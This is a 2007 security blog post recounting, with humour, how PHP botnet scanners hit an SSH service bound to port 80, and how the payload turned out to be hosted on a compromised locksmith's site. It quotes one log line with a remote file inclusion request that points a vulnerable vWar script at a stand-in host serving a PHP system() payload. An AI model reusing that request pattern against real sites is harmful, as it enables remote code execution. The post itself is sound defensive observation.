nCircle.com >> nCircle Blog >> Sync

« Patch, upgrade, hotfix -- its all risk | Main | Blogger's Code of Conduct Won't Fix the Problem »

Bot Traffic Irony

youwontbedissapointed.png
Put your trust in us

That is a direct quote from a website hosting malicious PHP payloads. This is a real story of irony. I laughed; I cried. Here we go.

Enter a publicly facing Unix system.
For whatever reason, it has SSH bound to a ton of ports, including 80 and 443.
The sysadmin reviews the logs daily.
What have we got today?
Look it's more PHP botnet traffic hitting port 80.
Silly bot, that's SSH bound to port 80.

Lets take a look at a log snippet

Apr 4 00:00:00 serverName sshd[93113]: Bad protocol version identification 'GET /PNC/modules/vWar_Account/includes/functions_common.php?vwar_root2= http://www.foo.com/safe' from x.x.x.x

Nothing to see here, move along, move along.
Just for fun, the sysadmin points his browser to www.foo.com/safe.
Nothing new here either, its standard PHP system() call.
Even for more fun, lets see what else is hosted at www.foo.com
It's a brochure website for a locksmith.
Their marketing tag line:

ALLOW US TO TAKE AWAY YOUR SECURITY PROBLEMS.

PUT YOUR TRUST IN US.

YOU WON'T BE DISAPPOINTED.

Maybe they specialize in bump keys?

(Picture is a screen shot snippet from the website. Real identities masked to protect the poor locksmith who probably has no idea what I'm talking about)

Posted by Andrew Storms on April 5, 2007 10:49 AM |

TrackBack

TrackBack URL for this entry:
http://blog.ncircle.com/cgi-bin/mt-tb.cgi/195

Post a comment

(If you haven't left a comment here before, you may need to be approved by the site owner before your comment will appear. Until then, it won't appear on the entry. Thanks for waiting.)

Verification (needed to reduce spam):

Bio

Blog: Sync
Author: Andrew Storms

As nCircle's Director of Security Operations, Andrew Storms is responsible for setting and enforcing the company's security compliance programs as well as overseeing day-to-day operations for the Information Technology department. He is a Certified Information Systems Security Professional (CISSP).

About

This page contains a single entry from the blog posted on April 5, 2007 10:49 AM.

The previous post in this blog was Patch, upgrade, hotfix -- its all risk.

The next post in this blog is Blogger's Code of Conduct Won't Fix the Problem.

Many more can be found on the main index page or by looking through the archives.

Search


Subscribe to this blog's feed
[What is this?]